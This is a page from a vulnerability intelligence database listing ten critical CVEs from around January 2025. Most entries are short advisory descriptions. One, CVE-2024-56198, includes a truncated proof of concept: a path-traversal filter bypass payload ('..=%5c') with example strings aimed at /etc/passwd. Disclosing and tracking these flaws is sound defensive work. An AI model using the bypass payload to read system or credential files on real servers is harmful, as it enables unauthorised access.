Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
CVE-2024-48956 |
Description: Serviceware Processes 6.0 through 7.3 before 7.4 allows attackers without valid authentication to send a specially crafted HTTP request to a service endpoint resulting in remote code execution.
CVSS: CRITICAL (9.8) EPSS Score: 0.04%
January 7th, 2025 (3 months ago)
|
|
CVE-2024-12583 |
Description: The Dynamics 365 Integration plugin for WordPress is vulnerable to Remote Code Execution and Arbitrary File Read in all versions up to, and including, 1.3.23 via Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.
CVSS: CRITICAL (9.9) EPSS Score: 0.06%
January 5th, 2025 (4 months ago)
|
|
CVE-2025-22275 |
Description: iTerm2 3.5.6 through 3.5.10 before 3.5.11 sometimes allows remote attackers to obtain sensitive information from terminal commands by reading the /tmp/framer.txt file. This can occur for certain it2ssh and SSH Integration configurations, during remote logins to hosts that have a common Python installation.
CVSS: CRITICAL (9.3) EPSS Score: 0.05%
January 4th, 2025 (4 months ago)
|
|
CVE-2024-9140 |
Description: Moxa’s cellular routers, secure routers, and network security appliances are affected by a critical vulnerability, CVE-2024-9140. This vulnerability allows OS command injection due to improperly restricted commands, potentially enabling attackers to execute arbitrary code. This poses a significant risk to the system’s security and functionality.
CVSS: CRITICAL (9.3) EPSS Score: 0.04%
January 4th, 2025 (4 months ago)
|
|
CVE-2024-56320 |
Description: GoCD is a continuous deliver server. GoCD versions prior to 24.5.0 are vulnerable to admin privilege escalation due to improper authorization of access to the admin "Configuration XML" UI feature, and its associated API. A malicious insider/existing authenticated GoCD user with an existing GoCD user account could abuse this vulnerability to access information intended only for GoCD admins, or to escalate their privileges to that of a GoCD admin in a persistent manner. it is not possible for this vulnerability to be abused prior to authentication/login. The issue is fixed in GoCD 24.5.0. GoCD users who are not able to immediate upgrade can mitigate this issue by using a reverse proxy, WAF or similar to externally block access paths with a `/go/rails/` prefix. Blocking this route causes no loss of functionality. If it is not possible to upgrade or block the above route, consider reducing the GoCD user base to more trusted set of users, including temporarily disabling use of plugins such as the guest-login-plugin, which allow limited anonymous access as a regular user account.
CVSS: CRITICAL (9.4) EPSS Score: 0.05%
January 4th, 2025 (4 months ago)
|
|
CVE-2024-56829 |
Description: Huang Yaoshi Pharmaceutical Management Software through 16.0 allows arbitrary file upload via a .asp filename in the fileName element of the UploadFile element in a SOAP request to /XSDService.asmx.
CVSS: CRITICAL (10.0) EPSS Score: 0.04%
January 3rd, 2025 (4 months ago)
|
|
CVE-2024-56249 |
Description: Unrestricted Upload of File with Dangerous Type vulnerability in Webdeclic WPMasterToolKit allows Upload a Web Shell to a Web Server.This issue affects WPMasterToolKit: from n/a through 1.13.1.
CVSS: CRITICAL (9.1) EPSS Score: 0.04%
January 3rd, 2025 (4 months ago)
|
|
CVE-2024-56198 |
Description: Summary
This is a POC for a path-sanitizer npm package. The filters can be bypassed and can result in path traversal.
Payload: ..=%5c can be used to bypass this on CLI (along with other candidates). Something similar would likely work on web apps as well.
PoC
Here's the code to test for the filter bypass:
const sanitize = require("path-sanitizer")
const path = require("path")
const fs = require("fs")
// Real scenario:
function routeHandler(myPath) {
// Lets just assume that the path was extracted from the request
// We want to read a file in the C:\Users\user\Desktop\myApp\ directory
// But the user should be able to access C:\Users\user\Desktop\
// So we need to sanitize the path
const APP_DIR = "/var/hacker"
const sanitized = path.join(APP_DIR, sanitize(myPath))
// Now we would usally read the file
// But in this case we just gonna print the path
// console.log(sanitized)
return sanitized
}
function readFile(filePath) {
const absolutePath = path.resolve(filePath) // Resolve to absolute path
fs.readFile(absolutePath, "utf8", (err, data) => {
if (err) {
console.error(`Error reading the file: ${err.message}`)
return
}
console.log(`Contents of the file ${filePath} :\n${data}`)
})
}
input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5ctmp/hacked.txt"
// input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5cetc/passwd"
input_user_payload = "../../../../../../../../tmp/hacked.txt"
readFile(routeHandler...
CVSS: CRITICAL (9.3) EPSS Score: 0.05%
January 2nd, 2025 (4 months ago)
|
|
CVE-2024-56220 |
Description: Incorrect Privilege Assignment vulnerability in SSL Wireless SSL Wireless SMS Notification allows Privilege Escalation.This issue affects SSL Wireless SMS Notification: from n/a through 3.5.0.
CVSS: CRITICAL (9.8) EPSS Score: 0.04%
January 1st, 2025 (4 months ago)
|
|
CVE-2024-56205 |
Description: Incorrect Privilege Assignment vulnerability in AI Magic allows Privilege Escalation.This issue affects AI Magic: from n/a through 1.0.4.
CVSS: CRITICAL (9.8) EPSS Score: 0.04%
January 1st, 2025 (4 months ago)
|